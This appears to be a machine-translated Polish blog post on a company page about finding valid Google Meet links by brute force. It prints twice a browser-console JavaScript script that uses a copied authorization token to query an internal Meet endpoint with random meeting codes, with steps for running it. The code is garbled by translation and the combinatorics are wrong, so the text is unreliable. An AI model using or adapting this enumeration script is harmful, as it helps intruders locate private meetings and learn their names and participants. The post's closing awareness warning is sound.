Visio – Utknij w Google Meet | Dyrk, Dyna Meet – Visio

Poznaj Visio

randomize = () => dico = diCo.Podział (”).Mapa (wartość => (< value, sort: Math.random() >)).zaklęcie ((a, b) => a.zaklęcie – b.zaklęcie).Mapa ((< value >) => Wartość).Dołączyć (”),
NewPatternkey = () => “xxx-xxxx-xxx”.Podział (”).Mapa (c => c == ‘-‘?Ciąg c.From Charcode (matematyka.Podłoga (matematyka.Random ()*25) +97)).Dołączyć (”),
Key = newPatternkey (), licznik = 20;
Następny = () => klucz.Podział (”).Mapa (e => e == ‘-‘ ? E: Dico [Dico.Indeks (e) + 1> = diCo.długość ? 0: Dico.Indeks (e) + 1]).Dołączyć (”),
Licznik = 0;
MeetLink = ‘https: // spotykaj się.Google.com/’, dostępny toe = () => xhr = nowy xmlhttprequest ();
If (licznik ++> = 20) licznik = 0;
Key = newPatternkey ();
Randomize ();
>
Key = następny ();
xhr.Open („Get”, MeetLink + Key);
xhr.AddEventlisner („ładuj”, (e) => fetch (MeetLink.Conat (“/$ rpc/google.RTC.spotkania.V1.MeetingSpaceService/DessistiMeetingSpace ”),„ Nagłówki ”:„ Autoryzacja ”: autoryzacja,
„Content-Type”: „Application/X-Protobuf”,
„X-Goog-Adep-Key”: E.cel.odpowiedzialność.Mecz (/\ [“https \: \/\/spotykaj \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
„X-Goog-Authuse”: „0”,
„X-Goog-incode-réspose-if-executable”: „base64”,
„X-Goog-Meeting-identifier”: BTOA (‘\ b \ x02 \ x12 \ f’.Conat (klucz)),
>,
„Ciało”: „\ n \ f”.Conat (klucz, „0 \ u0001”),
„Metoda”: „Post”
>).Następnie (e => e.Text ())
.następnie (e => settimeout (dostępny, 100);
konsola.Log (MeetLink.Conat (klucz).BeautifyDisplay (38), (e.Zamień (/[^a-za-z0-9]/g, „”)+„”).BeautifyDisplay (38));
>);
>);
xhr.Wysłać ();
>;
Strunowy.prototyp.BeautifyDisplay = funkcja (rozmiar) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >rozmiar ? tekst.Długość: rozmiar)).Podłoże (0, rozmiar).Conat (‘|’); >,
konsola.Jasne ();
dostępny ();
>) ()

Dyrk

Obecnie pracując w dziedzinie cyberbezpieczeństwa, regularnie stawiam czoła dość trywialne sytuacje.

Najnowsze, wtargnięcie osoby podczas spotkania .
Na szczęście ze względu na bezpieczeństwo spotkanie Google zawierało funkcję umożliwiającą zarówno ostrzeżenie uczestników, że dana osoba stara się dołączyć do wideokonferencji, ale także zaakceptować lub odmówić.

Jednak to wydarzenie zachęca mnie do zadawania sobie wielu pytań .

Złożoność linku Google Meet

Po pierwsze, w jaki sposób osoba może połączyć się z linkiem spotkania bez zaproszenia ?

Musimy rozważyć prostotę linku: https: // Google.poznać.com/Xxx -yyyy -zzzz

Xxx -yyyy -zzzz są tylko postaciami alfabetycznymi między A i Z, tj. 27 możliwych kombinacji dla każdej postaci.

Dla matematyków jest zatem:

27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 możliwe kombinacje .

Link Google Meet Meoge Link

Chociaż jesteśmy teraz w stanie lepiej zrozumieć, w jaki sposób budowane są linki naszych obligacji konferencyjnych „Google Meet”, istnieje bardzo ważny aspekt, który należy wziąć pod uwagę . Długość życia linku Google Meet !

Rzeczywiście, każdy może wygenerować spotkania Google w kilku kliknięciach.
Ale po kilku dniach, tygodniach lub miesiącach . Linki nie są już ważne.

Wygenerowane linki mają zatem pewien okres ważności .

Wyjątek sprawiają, że „powtarzające się” zdarzenia i tutaj staje się interesujące.
W biznesie istnieje wiele możliwości regularnego organizowania (zespół / biznes, codzienne, tygodniowe, miesięczne,, . )).
Gdy pracownik generuje tego typu zdarzenie w swoim porządku obrad, automatycznie generowany jest link Google Meet. Ten jest niezmienny.
Więc za każdym razem będziesz mieć ten sam link do tego wydarzenia.

Z odrobiną JavaScript i brutalnej siły ?

Przy wszystkich tych elementach jesteśmy teraz przygotowani do zamiatania wszystkich możliwości i osiągnięcia wysokich prawdopodobieństw w celu wykrycia linków do wideokonocjatów !

Mam więc trochę retro, który jest przedmiotem obsługi Google, aby napisać kod JavaScript, który wypróbuje nieskończoną liczbę kombinacji

(C) Dyrk.Org 2023-2024 – Roulette Meet’s Roulette
(1) Uruchom ten skrypt na https: // Google.poznać.com

)

Niech autoryzacja = “SAPISIDHASH XXXXXXXXXXXXXX_XXXXXXXXXXXXXXXXXXXXXXXXXXXX“, dico =” abcdefghijklmnopqrstuvxz “,

randomize = () => dico = diCo.Podział (”).Mapa (wartość => (< value, sort: Math.random() >)).zaklęcie ((a, b) => a.zaklęcie – b.zaklęcie).Mapa ((< value >) => Wartość).Dołączyć (”),
NewPatternkey = () => “xxx-xxxx-xxx”.Podział (”).Mapa (c => c == ‘-‘?Ciąg c.From Charcode (matematyka.Podłoga (matematyka.Random ()*25) +97)).Dołączyć (”),
Key = newPatternkey (), licznik = 20;
Następny = () => klucz.Podział (”).Mapa (e => e == ‘-‘ ? E: Dico [Dico.Indeks (e) + 1> = diCo.długość ? 0: Dico.Indeks (e) + 1]).Dołączyć (”),
Licznik = 0;
MeetLink = ‘https: // spotykaj się.Google.com/’, dostępny toe = () => xhr = nowy xmlhttprequest ();
If (licznik ++> = 20) licznik = 0;
Key = newPatternkey ();
Randomize ();
>
Key = następny ();
xhr.Open („Get”, MeetLink + Key);
xhr.AddEventlisner („ładuj”, (e) => fetch (MeetLink.Conat (“/$ rpc/google.RTC.spotkania.V1.MeetingSpaceService/DessistiMeetingSpace ”),„ Nagłówki ”:„ Autoryzacja ”: autoryzacja,
„Content-Type”: „Application/X-Protobuf”,
„X-Goog-Adep-Key”: E.cel.odpowiedzialność.Mecz (/\ [“https \: \/\/spotykaj \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
„X-Goog-Authuse”: „0”,
„X-Goog-incode-réspose-if-executable”: „base64”,
„X-Goog-Meeting-identifier”: BTOA (‘\ b \ x02 \ x12 \ f’.Conat (klucz)),
>,
„Ciało”: „\ n \ f”.Conat (klucz, „0 \ u0001”),
„Metoda”: „Post”
>).Następnie (e => e.Text ())
.Następnie (e =>

Settimeout (dostępny, 100);
konsola.Log (MeetLink.Conat (klucz).BeautifyDisplay (38), (e.Zamień (/[^a-za-z0-9]/g, „”)+„”).BeautifyDisplay (38));
>);
>);
xhr.Wysłać ();
>;
Strunowy.prototyp.BeautifyDisplay = funkcja (rozmiar) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >rozmiar ? tekst.Długość: rozmiar)).Podłoże (0, rozmiar).Conat (‘|’); >,
konsola.Jasne ();
dostępny ();
>) ()

Aby to wszystko działać, będzie konieczne:

  1. Otwórz stronę https: // spotykaj się.Google.com
  2. Otwórz konsolę programistów
  3. Na karcie „Network” odfiltruj pobór / xhr i odzyskaj token tokena“Upoważnienie”
  4. Skopiuj i wklej powyższy kod źródłowy i umieść na miejscu wskazanym tokenem.
  5. Sprawdź klawisz „wejście” na klawiaturze.

Odzyskiwanie tokenu „autoryzacji”:

Dla ciekawych powinien wyglądać wynik tego skryptu w akcji.
Dlatego zauważamy linie, które informują nas, że przestrzeń do wideokonferencji nie istnieje.
I inni, którzy postawili nas na dowód konferencji ! Dlatego wskazując, że łącze jest prawidłowe;)

Nie spodziewaj się jednak w ciągu kilku sekund na linku spotkań ^^
(Chyba że jesteś małym szczęśliwym człowiekiem)
Będziesz musiał być wielką cierpliwością, pozwalając jej trwać co najmniej pół godziny.

Wniosek

Nie panikuj, że istnieje większa liczba szczęścia, aby znaleźć ważny link Google Meet Link niż wygrana Loto.

Uwaga ! Osoba, która przychodzi ważny dostęp do linku do niektórych informacji bez konieczności połączenia:
Nazwa spotkania (zatem unikaj poślizgu poufnych informacji) i podłączonych uczestników (wszyscy lub gra).

Poznaj Visio

Napad online

Naklejka bestsellera online

gracze

Do 1000 graczy jednocześnie

Platforma łatwa do dostępu w Visio

Horyzont 2024

Miniatura - Horizon 2024 - Visio

gracze

Do 1000 graczy jednocześnie

Platforma łatwa do dostępu w Visio

Gdzie jest Charlie ?!

Miniatura - gdzie jest Charlie - Visio

gracze

Do 1000 graczy jednocześnie

Platforma łatwa do dostępu w Visio

Misja Enigma

Miniatura - Mission Enigma - Visio

gracze

Do 1000 graczy jednocześnie

Platforma łatwa do dostępu w Visio

Świadomość cyberbezpieczeństwa

Miniatura - Cyberbezpieczeństwo - Visio

gracze

Do 5000 graczy jednocześnie

Platforma łatwa do dostępu w Visio

Zapisz Boże Narodzenie !

Miniatura - Oszczędzaj Boże Narodzenie! - Visio

gracze

Do 1000 graczy jednocześnie

Platforma łatwa do dostępu w Visio

Copyright © 2023 – Dyna’meet

Zarządzaj zgodą na pliki cookie

Aby zaoferować najlepsze doświadczenia, używamy technologii, takich jak pliki cookie do przechowywania i/lub dostępu do informacji urządzeń. Zgoda na te technologie pozwoli nam przetwarzać dane, takie jak zachowanie nawigacyjne lub unikalne identyfikatory na tej stronie. Fakt, że nie wyraża zgody lub wycofanie zgody, może mieć negatywny wpływ na pewne cechy i funkcje.

Funkcjonalne funkcjonalne zawsze aktywowane

Pamięć lub dostęp techniczny jest ściśle konieczny pod koniec uzasadnionego zainteresowania, aby umożliwić korzystanie z określonej usługi wyraźnie żądane przez subskrybenta lub użytkownika, lub wyłącznie w celu przesyłania transmisji komunikacji w sieci komunikacji elektronicznej.

Preferencje preferencje

Przechowywanie lub dostęp techniczny jest niezbędny w celu uzasadnionego zainteresowania preferencjami, które nie są wymagane przez subskrybenta lub osobę korzystającą z Usługi.

Statystyka statystyczna

Przechowywanie lub dostęp techniczny, który jest używany wyłącznie do celów statystycznych. Przechowywanie lub dostęp techniczny, który jest używany wyłącznie w anonimowych celach statystycznych. W przypadku braku wezwania do pojawienia się, dobrowolna zgodność ze strony dostawcy dostępu do Internetu lub dodatkowych zapisów od strony trzeciej, informacje przechowywane lub wyodrębnione na tym końcu.

Dostęp do przechowywania lub techniczny jest niezbędny do tworzenia profili użytkowników w celu wysyłania reklam lub śledzenia użytkownika na stronie internetowej lub na kilku stronach internetowych o podobnych celach marketingowych.